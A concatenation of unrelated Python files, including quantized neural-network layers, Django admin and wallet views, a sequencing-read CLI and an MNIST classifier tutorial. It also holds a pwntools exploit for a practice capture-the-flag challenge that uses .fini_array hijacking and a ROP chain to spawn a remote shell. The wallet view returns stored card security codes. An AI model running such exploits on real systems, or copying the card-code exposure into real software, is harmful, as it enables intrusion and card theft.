self.clip_balanced = clip_balanced
# fetch weights
self.weights_1, self.weight_scale_1 = convert.inq_conv2d(net, "conv1")
assert self.weights_1.shape == (self.F1, 1, 1, 64)
self.weights_1 = np.reshape(self.weights_1, (self.F1, 64))
self.weights_2, self.weight_scale_2 = convert.inq_conv2d(net, "conv2")
assert self.weights_2.shape == (self.F2, 1, self.C, 1)
self.weights_2 = np.reshape(self.weights_2, (self.F2, self.C))
# fetch batch norm offset and scale
self.input_scale = convert.ste_quant(net, "quant1")
self.intermediate_scale = convert.ste_quant(net, "quant2")
self.output_scale = convert.ste_quant(net, "quant3")
self.bn_scale_1, self.bn_offset_1 = convert.batch_norm(net, "batch_norm1")
self.bn_scale_2, self.bn_offset_2 = convert.batch_norm(net, "batch_norm2")
self.factor_1, self.bias_1 = convert.div_factor_batch_norm(self.input_scale, self.weight_scale_1,
self.intermediate_scale, self.bn_scale_1,
self.bn_offset_1)
self.factor_2, self.bias_2 = convert.div_factor_batch_norm(self.intermediate_scale, self.weight_scale_2,
self.output_scale, self.bn_scale_2,
self.bn_offset_2, pool=8)
# update the factors and scales
for k in range(16):
self.factor_2[k] *= self.factor_1[k // 2]
self.bias_2[k] *= self.factor_1[k // 2]
def num_params(self):
count = reduce(mul, self.weights_1.shape)
count += reduce(mul, self.factor_1.shape)
count += reduce(mul, self.bias_1.shape)
count += reduce(mul, self.weights_2.shape)
count += reduce(mul, self.factor_2.shape)
count += reduce(mul, self.bias_2.shape)
return count
def mem_size(self):
count = reduce(mul, self.weights_1.shape)
count += 4 * reduce(mul, self.factor_1.shape)
count += 4 * reduce(mul, self.bias_1.shape)
count += 4 * reduce(mul, self.weights_2.shape)
count += 4 * reduce(mul, self.factor_2.shape)
count += 4 * reduce(mul, self.bias_2.shape)
return count
def __call__(self, x):
assert x.shape == self.input_shape, "shape was {}".format(x.shape)
y = F.conv_time(x, self.weights_1)
# add the offset
for k in range(self.F1):
y[k] += self.bias_1[k]
# do the second layer
y = F.depthwise_conv_space(y, self.weights_2)
y = F.relu(y, -(self.bias_2 // 8))
y = F.pool(y, (1, 8))
y = F.apply_factor_offset(y, self.factor_2, self.bias_2, clip_balanced=self.clip_balanced)
return y
class Layer1(Layer):
"""
Convolution(time) + BN
"""
def __init__(self, net, C, T, F1, clip_balanced=True, **params):
self.name = "Layer 1: Convolution in Time + Batch Norm"
self.C = C
self.T = T
self.F1 = F1
self.input_shape = ((C, T))
self.output_shape = ((F1, C, T))
self.clip_balanced = clip_balanced
# fetch weights
self.weights, self.weight_scale = convert.inq_conv2d(net, "conv1")
assert self.weights.shape == (self.F1, 1, 1, 64)
self.weights = np.reshape(self.weights, (self.F1, 64))
# fetch batch norm offset and scale
self.input_scale = convert.ste_quant(net, "quant1")
self.output_scale = convert.ste_quant(net, "quant2")
self.bn_scale, self.bn_offset = convert.batch_norm(net, "batch_norm1")
self.factor, self.bias = convert.div_factor_batch_norm(self.input_scale, self.weight_scale,
self.output_scale, self.bn_scale,
self.bn_offset)
def num_params(self):
count = reduce(mul, self.weights.shape)
count += reduce(mul, self.factor.shape)
count += reduce(mul, self.bias.shape)
return count
def mem_size(self):
count = reduce(mul, self.weights.shape)
count += 4 * reduce(mul, self.factor.shape)
count += 4 * reduce(mul, self.bias.shape)
return count
def __call__(self, x):
assert x.shape == self.input_shape, "shape was {}".format(x.shape)
y = F.conv_time(x, self.weights)
y = F.apply_factor_offset(y, self.factor, self.bias, clip_balanced=self.clip_balanced)
return y
class Layer2(Layer):
"""
Convolution(channels) + BN + ReLU + Pool
"""
def __init__(self, net, C, T, F1, F2, reorder_bn=True, clip_balanced=True, **params):
self.name = "Layer 2: Convolution in Space + Batch Norm + ReLU + Pooling"
self.C = C
self.T = T
self.F1 = F1
self.F2 = F2
self.input_shape = ((F1, C, T))
self.output_shape = ((F2, T // 8))
self.clip_balanced = clip_balanced
self.reorder_bn = reorder_bn
# fetch weights
self.weights, self.weight_scale = convert.inq_conv2d(net, "conv2")
self.float_weights = np.reshape(net["conv2.weightFrozen"], (self.F2, self.C))
self.float_weights = np.flip(self.float_weights, (-1))
assert self.weights.shape == (self.F2, 1, self.C, 1)
self.weights = np.reshape(self.weights, (self.F2, self.C))
# fetch batch norm offset and scale
self.input_scale = convert.ste_quant(net, "quant2")
self.output_scale = convert.ste_quant(net, "quant3")
self.bn_scale, self.bn_offset = convert.batch_norm(net, "batch_norm2")
self.factor, self.bias = convert.div_factor_batch_norm(self.input_scale, self.weight_scale,
self.output_scale, self.bn_scale,
self.bn_offset, pool=8)
def num_params(self):
count = reduce(mul, self.weights.shape)
count += reduce(mul, self.factor.shape)
count += reduce(mul, self.bias.shape)
return count
def mem_size(self):
count = reduce(mul, self.weights.shape)
count += 4 * reduce(mul, self.factor.shape)
count += 4 * reduce(mul, self.bias.shape)
return count
def __call__(self, x):
assert x.shape == self.input_shape
y = F.depthwise_conv_space(x, self.weights)
if self.reorder_bn:
y = F.relu(y, -(self.bias // 8))
y = F.pool(y, (1, 8))
y = F.apply_factor_offset(y, self.factor, self.bias, clip_balanced=self.clip_balanced)
else:
y = F.apply_factor_offset(y, self.factor // 8, self.bias // 8,
clip_balanced=self.clip_balanced)
y = F.relu(y, (self.bias) * 0)
y = F.pool(y, (1, 8)) // 8
return y
class Layer3(Layer):
"""
Convolution(T)
"""
def __init__(self, net, T, F2, clip_balanced=True, **params):
self.name = "Layer 3: Convolution in Time"
self.T = T
self.F2 = F2
self.input_shape = ((F2, T // 8))
self.output_shape = ((F2, T // 8))
self.clip_balanced = clip_balanced
# fetch weights
self.weights, self.weight_scale = convert.inq_conv2d(net, "sep_conv1")
assert self.weights.shape == (self.F2, 1, 1, 16)
self.weights = np.reshape(self.weights, (self.F2, 16))
# fetch batch norm offset and scale
self.input_scale = convert.ste_quant(net, "quant3")
self.output_scale = convert.ste_quant(net, "quant4")
self.factor = convert.div_factor(self.input_scale, self.weight_scale, self.output_scale)
def num_params(self):
return reduce(mul, self.weights.shape) + 1
def mem_size(self):
return reduce(mul, self.weights.shape) + 4
def __call__(self, x):
assert x.shape == self.input_shape, "shape was {}".format(x.shape)
y = F.depthwise_conv_time(x, self.weights)
y = F.apply_factor_offset(y, self.factor, clip_balanced=self.clip_balanced)
return y
class Layer4(Layer):
"""
Convolution(1x1) + BN + ReLU + Pool
"""
def __init__(self, net, T, F2, reorder_bn=True, clip_balanced=True, **params):
self.name = "Layer 4: Point Convolution + Batch Norm + ReLU + Pooling"
self.T = T
self.F2 = F2
self.input_shape = ((F2, T // 8))
self.output_shape = ((F2, T // 64))
self.clip_balanced = clip_balanced
self.reorder_bn = reorder_bn
# fetch weights
self.weights, self.weight_scale = convert.inq_conv2d(net, "sep_conv2")
assert self.weights.shape == (self.F2, self.F2, 1, 1)
self.weights = np.reshape(self.weights, (self.F2, self.F2))
# fetch batch norm offset and scale
self.input_scale = convert.ste_quant(net, "quant4")
self.output_scale = convert.ste_quant(net, "quant5")
self.bn_scale, self.bn_offset = convert.batch_norm(net, "batch_norm3")
self.factor, self.bias = convert.div_factor_batch_norm(self.input_scale, self.weight_scale,
self.output_scale, self.bn_scale,
self.bn_offset, pool=8)
def num_params(self):
count = reduce(mul, self.weights.shape)
count += reduce(mul, self.factor.shape)
count += reduce(mul, self.bias.shape)
return count
def mem_size(self):
count = reduce(mul, self.weights.shape)
count += 4 * reduce(mul, self.factor.shape)
count += 4 * reduce(mul, self.bias.shape)
return count
def __call__(self, x):
assert x.shape == self.input_shape, "shape was {}".format(x.shape)
y = F.pointwise_conv(x, self.weights)
if self.reorder_bn:
y = F.relu(y, -(self.bias // 8))
y = F.pool(y, (1, 8))
y = F.apply_factor_offset(y, self.factor, self.bias, clip_balanced=self.clip_balanced)
else:
y = F.apply_factor_offset(y, self.factor // 8, self.bias // 8,
clip_balanced=self.clip_balanced)
y = F.relu(y, (self.bias) * 0)
y = F.pool(y, (1, 8)) // 8
return y
class Layer5(Layer):
"""
Linear Layer
"""
def __init__(self, net, T, F2, N, clip_balanced=True, **params):
self.name = "Layer 5: Linear Layer"
self.T = T
self.F2 = F2
self.N = N
self.flatten_dim = self.F2 * (self.T // 64)
self.input_shape = ((F2, T // 64))
self.output_shape = ((N, ))
self.clip_balanced = clip_balanced
# fetch weights
self.weights, self.bias, self.weight_scale = convert.inq_linear(net, "fc")
assert self.weights.shape == (self.N, self.flatten_dim)
self.input_scale = convert.ste_quant(net, "quant5")
self.output_scale = convert.ste_quant(net, "quant6")
self.factor = convert.div_factor(self.input_scale, self.weight_scale, self.output_scale)
def num_params(self):
count = reduce(mul, self.weights.shape)
count += reduce(mul, self.bias.shape)
return count
def mem_size(self):
return self.num_params()
def __call__(self, x):
assert x.shape == self.input_shape, "shape was {}".format(x.shape)
x = x.ravel()
y = F.linear(x, self.weights, self.bias)
y = F.apply_factor_offset(y, self.factor, clip_balanced=self.clip_balanced)
return y
|
DEFAULT_CONFIG_FILENAME = "art.yaml"
|
from django.contrib import admin
from app1.models import OtherUser, Category, Item, ItemImageAndVideos, Offers, Searches, Message, Notifications, ShipmentDetails, ContactUs
# Register your models here.
admin.site.register(OtherUser)
admin.site.register(Category)
admin.site.register(Item)
admin.site.register(ItemImageAndVideos)
admin.site.register(Offers)
admin.site.register(Searches)
admin.site.register(Message)
admin.site.register(Notifications)
admin.site.register(ShipmentDetails)
admin.site.register(ContactUs)
|
#!/usr/bin/python3
'''
Author : Sonal Rashmi
Date : 16/07/2020
Description : IPD Command Line Interface with two subparser long and short read.
'''
import argparse
import os
import sys
from commandlineparser import *
from ipdshortread import *
from ipdlongread import *
import pathlib
#Directory and file check
def file_choices(choices,fname):
ext = ''.join(pathlib.Path(fname).suffixes)
fnamewrong=True
for c in choices:
if fname.endswith(c):
fnamewrong=False
if ext.lower() not in choices and fnamewrong:
print(ext)
raise argparse.ArgumentTypeError('File must have proper extension')
return fname
def dir_path(path):
if os.path.isdir(path):
return path
else:
raise NotADirectoryError(path)
#define parser and subparsers
def main():
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('-p',dest='prefix',type=str,required=True,help="set project name")
parent_parser.add_argument('-t',dest='thread',type=int,default=4,required=False,help="set threads (default = 4)")
parent_parser.add_argument('-m',dest='molecular_type',type=str,choices=['dna','rna'],required=True,help="set molecular type (DNA or RNA)")
parent_parser.add_argument('-o',dest='outdir',type= lambda path:dir_path(path),required=True,default=os.getcwd(),help="set Output Directory")
parser = argparse.ArgumentParser(add_help=False)
subparsers = parser.add_subparsers(dest='parser_name')
# subcommand long parser
parser_SingleEndSample = subparsers.add_parser('long', parents = [parent_parser])
parser_SingleEndSample.add_argument('-i',dest='input_file',required=True,type=lambda s:file_choices((".fastq",".fastq.gz",".fq.gz",".fq"),s),help="Fastq file (With Complete Path)")
# subcommand short parser
parser_PairedEndSample = subparsers.add_parser('short', parents = [parent_parser])
parser_PairedEndSample.add_argument('-i',dest='input_files',nargs='+',required=True,type=lambda s:file_choices((".fastq",".fastq.gz",".fq.gz",".fq"),s),help="Fastq file/files (With Complete Path)")
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
else:
if args.parser_name == "long":
runmode="SingleEndSample"
sampleinfo=None
fastq2 = None
return_list=[runmode, args.outdir, args.prefix, args.molecular_type, args.thread, sampleinfo, args.input_file, fastq2]
Parser=CommandLineInterfaceParser(return_list)
maplist=Parser.map_single_end_sample()
for inmap in maplist:
try:
i=IPDLongRead(inmap)
except TypeError:
parser.print_help()
#print(inmap)
sys.exit(0)
elif args.parser_name == "short":
input_file_len=len(args.input_files)
if input_file_len == 1:
runmode="SingleEndSample"
sampleinfo=None
fastq2 = None
return_list=[runmode, args.outdir, args.prefix, args.molecular_type, args.thread, sampleinfo, args.input_files[0], fastq2]
Parser=CommandLineInterfaceParser(return_list)
maplist=Parser.map_single_end_sample()
for inmap in maplist:
try:
i=IPDShortRead(inmap)
except TypeError:
parser.print_help()
#print(inmap)
sys.exit(0)
elif input_file_len == 2:
runmode="PairedEndSample"
sampleinfo = None
return_list=[runmode, args.outdir, args.prefix, args.molecular_type, args.thread, sampleinfo, args.input_files[0], args.input_files[1]]
Parser=CommandLineInterfaceParser(return_list)
maplist=Parser.map_paired_sample()
for inmap in maplist:
try:
i=IPDShortRead(inmap)
except TypeError:
parser.print_help()
#print(inmap)
sys.exit(0)
else:
print("Invalid Input")
sys.exit()
else:
print("Invalid Option")
sys.exit()
if __name__ =="__main__":
main()
|
import requests
from urllib.parse import urljoin
class Buyer:
def __init__(self, url_prefix):
self.url_prefix = urljoin(url_prefix, "buyer/")
def getMemberInfo(self,username : str,token: str)->(str,str,str):
json = {"username": username}
headers = {"token": token}
url = urljoin(self.url_prefix, "getMemberInfo")
r = requests.get(url, headers=headers, json=json)
if r.status_code == 200:
return r.json()["name"],r.json()["sex"],r.json()["tele"]
else:
return "","",""
def editMemberInfo(self,username : str,token : str) ->(bool):
json = {"username": username}
headers = {"token": token}
url = urljoin(self.url_prefix,"editMemberInfo")
r = requests.post(url, headers = headers, json=json)
return r.status_code == 200
def getMemberOrder(self,username : str,token : str) ->(str,str,str,str,str):
json = {"username": username}
headers = {"token": token}
url = urljoin(self.url_prefix,"getMemberOrder")
r = requests.get(url, headers = headers,json=json)
if r.status_code == 200:
return r.json()["orderId"],r.json()["orderDate"],r.json()["orderStatus"],r.json()["productName"],r.json()["productPrice"]
else:
return "","","","",""
def getRefundOrder(self,username : str,token : str)->(str,str,str):
json = {"username": username}
headers = {"token": token}
url = urljoin(self.url_prefix,"getRefundOrder")
r = requests.get(url, headers = headers,json=json)
if r.status_code == 200:
return r.json()["orderId"],r.json()["productName"],r.json()["productPrice"]
else:
return "","",""
def getMemberConsignee(self,username : str,token : str)->(str):
json = {"username": username}
headers = {"token": token}
url = urljoin(self.url_prefix, "getMemberConsignee")
r = requests.get(url, headers=headers, json=json)
if r.status_code == 200:
return r.json()["address"]
else:
return ""
def editConsignee(self,username : str,token : str)->(bool):
json = {"username": username}
headers = {"token": token}
url = urljoin(self.url_prefix, "editConsignee")
r = requests.post(url, headers=headers, json=json)
return r.status_code == 200
|
import json
from datetime import date
from decimal import *
from functools import cmp_to_key
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_http_methods
from .models import Wallet, Card
from django.http import JsonResponse, HttpResponse
# Create your views here.
@login_required
@require_http_methods(["GET"])
def get_wallet_info(request):
try:
wallet = Wallet.objects.get(owner=request.user)
response_data = {
'owner': wallet.owner.username,
'max_limit': str(wallet.get_max_limit()),
'user_limit': str(wallet.userLimit) if wallet.userLimit else '',
'balance': str(wallet.get_balance()),
'available_credit': str(wallet.get_available_credit())
}
except Exception as err:
raise err
else:
return JsonResponse(response_data, status=200)
@login_required
@require_http_methods(["GET"])
def get_cards(request):
try:
wallet = Wallet.objects.get(owner=request.user)
cards = sorted(wallet.get_cards(), key=cmp_to_key(Card.compare))
response_data = dict()
for card in cards:
response_data[card.number] = {
'dueDate': card.dueDate.strftime('%d'),
'validThru': card.validThru.strftime('%m/%y'),
'name': card.name,
'secureCode': card.secureCode,
'creditLimit': str(card.creditLimit),
'balance': str(card.balance),
'available_credit': str(card.get_available_credit())
}
except Exception as err:
raise err
else:
return JsonResponse(response_data, status=200)
@login_required
@require_http_methods(["POST"])
def add_card(request):
try:
wallet = Wallet.objects.get(owner=request.user)
wallet.add_card(
number=request.POST.get('number'),
duedate=date(1900, 1, int(request.POST.get('duedateday'))),
validthru=date(int(request.POST.get('validthruyear')), int(request.POST.get('validthrumonth')), 1),
name=request.POST.get('name'),
securecode=request.POST.get('securecode'),
creditlimit=Decimal(request.POST.get('creditlimit')),
balance=Decimal(request.POST.get('balance'))
)
except Exception as err:
raise err
else:
return HttpResponse(status=200)
@login_required
@require_http_methods(["POST"])
def rm_card(request):
try:
wallet = Wallet.objects.get(owner=request.user)
wallet.rm_card(Card.objects.get(number=request.POST.get('number')))
except Exception as err:
raise err
else:
return HttpResponse(status=200)
@login_required
@require_http_methods(["POST"])
def add_purchase(request):
try:
wallet = Wallet.objects.get(owner=request.user)
wallet.add_purchase(Decimal(request.POST.get('value')))
except Exception as err:
raise err
else:
return HttpResponse(status=200)
@login_required
@require_http_methods(["POST"])
def set_limit(request):
try:
wallet = Wallet.objects.get(owner=request.user)
wallet.set_user_limit(Decimal(request.POST.get('userlimit')) if request.POST.get('userlimit') else None)
except Exception as err:
raise err
else:
return HttpResponse(status=200)
@login_required
@require_http_methods(["POST"])
def release_credit(request):
try:
card = Card.objects.get(number=request.POST.get('cardnumber'))
card.release_credit(Decimal(request.POST.get('value')))
except Exception as err:
raise err
else:
return HttpResponse(status=200)
|
import turtle
def draw_triangle(some_turtle):
for i in range(1,4):
some_turtle.backward(100)
some_turtle.right(60)
some_turtle.right(60)
def draw_square(some_turtle):
for i in range(1,5):
some_turtle.backward(100)
some_turtle.left(90)
def draw_art():
window = turtle.Screen()
window.bgcolor("yellow")
#create turtle brad- draw a square
brad = turtle.Turtle()
brad.shape("turtle")
brad.color("blue")
brad.speed(2)
for i in range(1,2):
draw_triangle(brad)
# brad.right(10)
diva = turtle.Turtle()
diva.shape("arrow")
diva.color("green")
diva.speed(2)
for i in range(1,2):
draw_square(diva)
window.exitonclick()
draw_art()
|
#!/usr/bin/python
# -*- coding: cp936 -*-
""" clientTradeEventUtility.py
对db中clientTradeEvent表格进行数据处理
"""
import sqlite3
class clientTradeEventUtility:
'''
拿到有效交易的用户以及其有效交易的时间(进行最早交易的那一天)
@return: dictionary: {effectivekhcode: effectivetradedate}
'''
def geteffectiveTradeUsersAndDates(self):
myDict = {}
# 基于 clienttradeevent 里面的数据统计出有效trade的人
with sqlite3.connect('C:\sqlite\db\hxdata.db') as db:
sqStatement = 'SELECT khcode, tradedate FROM clienttradeevent'
for khcode, tradedate in db.execute(sqStatement):
#按日期顺序遍历
if str(khcode).strip() not in myDict:
myDict[str(khcode).strip()] = tradedate
return myDict
#print(clientTradeEventUtility().geteffectiveTradeUsersAndDates())
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
import time
from pwn import *
#context.log_level = 'debug'
elf = ELF('./3x17')
# Memory locations
fini_array = 0x4b40f0
__libc_csu_fini = 0x402960
elf_main = 0x401b6d
bin_sh = elf.bss()
# Gadgets
leave_ret = 0x401c4b
ret = 0x401016
pop_rax_ret = 0x41e4af
pop_rdi_ret = 0x401696
pop_rsi_ret = 0x406c30
pop_rdx_ret = 0x446e35
syscall = 0x4022b4
# Byte sequence alias
A8 = 8 * b'A'
def proc_write(proc, addr, data):
proc.recvuntil('addr:')
proc.send(str(addr).encode())
proc.recvuntil('data:')
proc.send(data)
def main():
"""
Main idea: .fini_array hijacking + ROP
0. In this challenge, all debugging symbols were not
compiled into the ELF, so we have to find out the
address of main() by ourselves.
The entry point of the program is _start(). In gdb,
we can run the command `starti` (exectue just 1 instruction
and break immediately), and then we will be able to
find out the address of main().
What _start() does is simply invoke __libc_start_main().
int __libc_start_main(int (*main)(int, char **, char **), # rdi
int argc, # rsi
char **ubp_av, # rdx
void (*init)(void), # rcx
void (*fini)(void), # r8
void (*rtld_fini)(void), # r9
void (*stack_end)); # $rbp + 16
1. Hijack .fini_array and create a loop of arbitrary write:
a) .fini_array[0] = __libc_csu_fini()
b) .fini_array[1] = main()
This will cause __libc_csu_fini() -> main() -> __libc_csu_fini() -> main()...
Don't worry about the stack, it should be large enough :)
Note: in main(), writing to arbitray memory address
is allowed only if *0x4b9330 == 1, and since
*0x4b9330 is a char (1 byte), we can simply let it run
255 times and it will wrap around.
2. To break the loop, overwrite .fini_array[0] to
another function other than __libc_csu_fini().
3. Stack pivoting:
a) .fini_array[0 ] = `leave ; ret`
b) .fini_array[1 ] = `ret`
c) .fini_array[2:] = rop_chain
where `leave` = `mov rsp, rbp` ; `pop rbp`
External Reference:
---
[1] http://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html
[2] https://www.mdeditor.tw/pl/pxws
"""
proc = remote('chall.pwnable.tw', 10105)
#proc = elf.process()
#log.debug('You may attatch this process to gdb now.')
#raw_input()
# 1. Create a loop of arbitrary write.
proc_write(proc, fini_array, p64(__libc_csu_fini) + p64(elf_main))
# 2. Write '/bin/sh\x00' to elf.bss()
proc_write(proc, bin_sh, b'/bin/sh\x00')
# 3. Write ROP chain (starting at .fini_array[2])
payload = p64(pop_rax_ret) # ret
payload += p64(59) # rax = 59
payload += p64(pop_rdi_ret) # ret
proc_write(proc, fini_array + 16, payload)
payload = p64(bin_sh) # rdi = bin_sh
payload += p64(pop_rsi_ret) # ret
payload += p64(0) # rsi = 0
proc_write(proc, fini_array + 40, payload)
payload = p64(pop_rdx_ret) # ret
payload += p64(0) # rdx = 0
payload += p64(syscall) # ret
proc_write(proc, fini_array + 64, payload)
# 4. Stack pivot and execute ROP chain
proc_write(proc, fini_array, p64(leave_ret) + p64(ret))
proc.interactive()
if __name__ == '__main__':
main()
|
# Setup
from __future__ import division, print_function, unicode_literals
import pickle
import numpy as np
import os
from sklearn.linear_model import SGDClassifier
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.metrics import confusion_matrix
from sklearn.metrics import precision_score, recall_score
from sklearn.metrics import f1_score
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import roc_curve
from sklearn.metrics import roc_auc_score
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import GridSearchCV
from scipy.ndimage import shift
# to make output stable across runs
def seed_rand(x=42):
return np.random.seed(x)
# To plot pretty figures
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rc('axes', labelsize=14)
mpl.rc('xtick', labelsize=12)
mpl.rc('ytick', labelsize=12)
# Where to save the figures
PROJECT_ROOT_DIR = "/Users/shirelga/liat/dev/fabus"
CHAPTER_ID = "Classification"
def save_fig(fig_id, tight_layout=True):
path = os.path.join(PROJECT_ROOT_DIR, fig_id + ".png")
print("Saving figure", fig_id)
if tight_layout:
plt.tight_layout()
plt.savefig(path, format='png', dpi=300)
# MNIST
def sort_by_target(mnist):
reorder_train = np.array(sorted([(target, i) for i, target in enumerate(mnist.target[:60000])]))[:, 1]
reorder_test = np.array(sorted([(target, i) for i, target in enumerate(mnist.target[60000:])]))[:, 1]
mnist.data[:60000] = mnist.data[reorder_train]
mnist.target[:60000] = mnist.target[reorder_train]
mnist.data[60000:] = mnist.data[reorder_test + 60000]
mnist.target[60000:] = mnist.target[reorder_test + 60000]
def fetch_mnist_data():
try:
from sklearn.datasets import fetch_openml
mnist = fetch_openml('mnist_784', version=1, cache=True)
mnist.target = mnist.target.astype(np.int8) # fetch_openml() returns targets as strings
sort_by_target(mnist) # fetch_openml() returns an unsorted dataset
except ImportError:
from sklearn.datasets import fetch_mldata
mnist = fetch_mldata('MNIST original')
return mnist
mnist = fetch_mnist_data()
print("sorted MNIST dataset: \n", mnist["data"], mnist["target"])
print("\n")
print("(data, target) shape: \n", mnist.data.shape)
print("\n")
X, y = mnist["data"], mnist["target"]
print("X - data shape: \n", X.shape)
print("\n")
print("y - target key - labels shape: \n", y.shape)
print("\n")
print("each image has 28*28 pixels=", 28 * 28)
print("features\n\n")
some_digit = X[36000]
some_digit_image = some_digit.reshape(28, 28)
plt.imshow(some_digit_image, cmap=mpl.cm.binary, interpolation="nearest")
plt.axis("off")
#plt.show()
print("Label of some digit\n", y[36000])
# Split data to train and test
X_train, X_test, y_train, y_test = X[:60000], X[60000:], y[:60000], y[60000:]
shuffle_index = np.random.permutation(60000)
X_train, y_train = X_train[shuffle_index], y_train[shuffle_index]
# Binary classifier , simplify the problem
y_train_5 = (y_train == 5)
y_test_5 = (y_test == 5)
# Train SGDClassifier and train it on whole training set
sgd_clf = SGDClassifier(max_iter=5, tol=-np.infty, random_state=42)
sgd_clf.fit(X_train, y_train_5)
print("is the model predicted right?True or False:\n", sgd_clf.predict([some_digit]))
print("\n")
# Prefomance measures - evaluating a classifier
# Measuring Accuracy using cross-Validation
cross_acc_5 = cross_val_score(sgd_clf, X_train, y_train_5, cv=3, scoring="accuracy")
print("Accuracy:\n", cross_acc_5)
print("\n")
# Measuring Accuracy using Confusion Matrix
# First we need set of predictions
y_train_pred = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3)
# Passed target classes and the predicted classes to the CM
cm = confusion_matrix(y_train_5, y_train_pred)
print("Confusion matrix: \n", cm)
print("\n")
# Accuracy of th Positive predicted value
precision_ = precision_score(y_train_5, y_train_pred)
print("This is the precision:\n", precision_)
print("\n")
# TPR
recall_ = recall_score(y_train_5, y_train_pred)
print("This is the recall:\n", recall_)
print("\n")
# f1 score is
# TP/(TP+((FN+FP)/2))
f_one_score = f1_score(y_train_5, y_train_pred)
print("This is the f1 score:\n", f_one_score)
print("\n")
# decision_function() returns a score for each instance
y_scores = sgd_clf.decision_function([some_digit])
print("Score for each instance:", y_scores)
# make predictions based on those decision_function() scores
# using any treshold
treshold = 0
y_some_digit_pred = (y_scores > treshold)
print("Predictions using zero treshold:", y_some_digit_pred)
# decide which threshold to use
# first we get scores of all instances in the training set using cross validation predict
y_scores = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3, method="decision_function")
print("Dimention of the y_score generated by cross_val_predict():\n", y_scores.shape
)
print("\n")
if y_scores.ndim == 2:
y_scores = y_scores[:, 1]
print("Dimention with hack around issue 9589 in sklearn shape:\n", y_scores.shape)
print("\n")
# now with the scores we can compute precision and recall
precisions, recalls, thresholds = precision_recall_curve(y_train_5, y_scores)
def plot_precision_recall_vs_threshold(precisions, recalls, thresholds):
plt.plot(thresholds, precisions[:-1], "b--", label="Precision", linewidth=2)
plt.plot(thresholds, recalls[:-1], "g-", label="Recall", linewidth=2)
plt.xlabel("Threshold", fontsize=16)
plt.legend(loc="upper left", fontsize=16)
plt.ylim([0, 1])
plt.figure(figsize=(8, 4))
plot_precision_recall_vs_threshold(precisions, recalls, thresholds)
plt.xlim([-700000, 700000])
#save_fig("precision_recall_vs_threshold_plot")
#plt.show()
y_train_pred_90 = (y_scores > 70000)
precision_score_90 = precision_score(y_train_5, y_train_pred_90)
print("Precision for 70000 threshold:", precision_score_90)
recall_score_90acc = recall_score(y_train_5, y_train_pred_90)
print("Recall for 70000 threshold:", recall_score_90acc)
def plot_precision_vs_recall(precisions, recalls):
plt.plot(recalls, precisions, "b-", linewidth=2)
plt.xlabel("Recall", fontsize=16)
plt.ylabel("Precision", fontsize=16)
plt.axis([0, 1, 0, 1])
plt.figure(figsize=(8, 6))
plot_precision_vs_recall(precisions, recalls)
#save_fig("precision_vs_recall_plot")
#plt.show()
# ROC curves
# computing FPR and TPR for varios threshold values
fpr, tpr, thresholds = roc_curve(y_train_5, y_scores)
# plot FPR against the TPR
def plot_roc_curve(fpr, tpr, label=None):
plt.plot(fpr, tpr, linewidth=2, label=label)
plt.plot([0, 1], [0, 1], 'k--')
plt.axis([0, 1, 0, 1])
plt.xlabel('False Positive Rate', fontsize=16)
plt.ylabel('True Positive Rate', fontsize=16)
plt.figure(figsize=(8, 6))
plot_roc_curve(fpr, tpr)
#save_fig("roc_curve_plot")
#plt.show()
# A perfect classifier will have a ROC AUC equal to 1,whereas a purely classifier will have 0.5
roc_auc = roc_auc_score(y_train_5, y_scores)
print("This is roc curve auc for SGD classifier:", roc_auc)
# train RF
forest_clf = RandomForestClassifier(n_estimators=10, random_state=42)
y_probas_forest = cross_val_predict(forest_clf, X_train, y_train_5, cv=3, method="predict_proba")
y_scores_forest = y_probas_forest[:, 1]
fpr_forest, tpr_forest, threshold_forest = roc_curve(y_train_5, y_scores_forest)
plt.plot(fpr, tpr, "b:", label="SGD")
plot_roc_curve(fpr_forest, tpr_forest, "Random Forest")
plt.legend(loc="lower right")
#plt.show()
roc_auc_RFclassifier = roc_auc_score(y_train_5, y_scores_forest)
print("This is roc curve auc for Random Forest classifier:", roc_auc_RFclassifier)
# measuring the precision and recall, f1 also
y_train_pred_forest = cross_val_predict(forest_clf, X_train, y_train_5, cv=3)
accuracy_random_forest = precision_score(y_train_5, y_train_pred_forest)
print("Accuracy using Random Forest:\n", accuracy_random_forest)
recall_random_forest = recall_score(y_train_5, y_train_pred_forest)
print("Recall using Random Forest:\n", recall_random_forest)
f1 = f1_score(y_train_5, y_train_pred_forest)
print('Random forest f1 score:\n', f1)
# Multi class classification
# OVA
sgd_clf.fit(X_train, y_train)
print(sgd_clf.predict([some_digit]))
some_digit_score = sgd_clf.decision_function([some_digit])
print(some_digit_score)
print("The higher score for OvA is indeed the one corresponding to class:\n", np.argmax(some_digit_score))
print("SGD classes:\n", sgd_clf.classes_)
print("The sgd_clf.classes_[5]", sgd_clf.classes_[5])
# OvO
from sklearn.multiclass import OneVsOneClassifier
ovo_clf = OneVsOneClassifier(SGDClassifier(max_iter=5, tol=-np.infty, random_state=42))
ovo_clf.fit(X_train, y_train)
prediction_ovo = ovo_clf.predict([some_digit])
print("OvO prediction:\n", prediction_ovo)
print("Num of training binary classifiers:", len(ovo_clf.estimators_))
# Training a Random Forest Classifier
forest_clf.fit(X_train, y_train)
random_forest_predicted = forest_clf.predict([some_digit])
print("random forest predicted:\n", random_forest_predicted)
# Getting the list of probalities that classifier assigned to each instance for each class
probabilities_for_each_class = forest_clf.predict_proba([some_digit])
print("probalities for each class:\n", probabilities_for_each_class)
# evaluate SGD
acc = cross_val_score(sgd_clf, X_train, y_train, cv=3, scoring="accuracy")
print("SGD accuracy:\n", acc)
# Scaling the inputs to increas accuracy
scalar = StandardScaler()
X_train_scaled = scalar.fit_transform(X_train.astype(np.float64))
scaled_score = cross_val_score(sgd_clf, X_train_scaled, y_train, cv=3, scoring="accuracy")
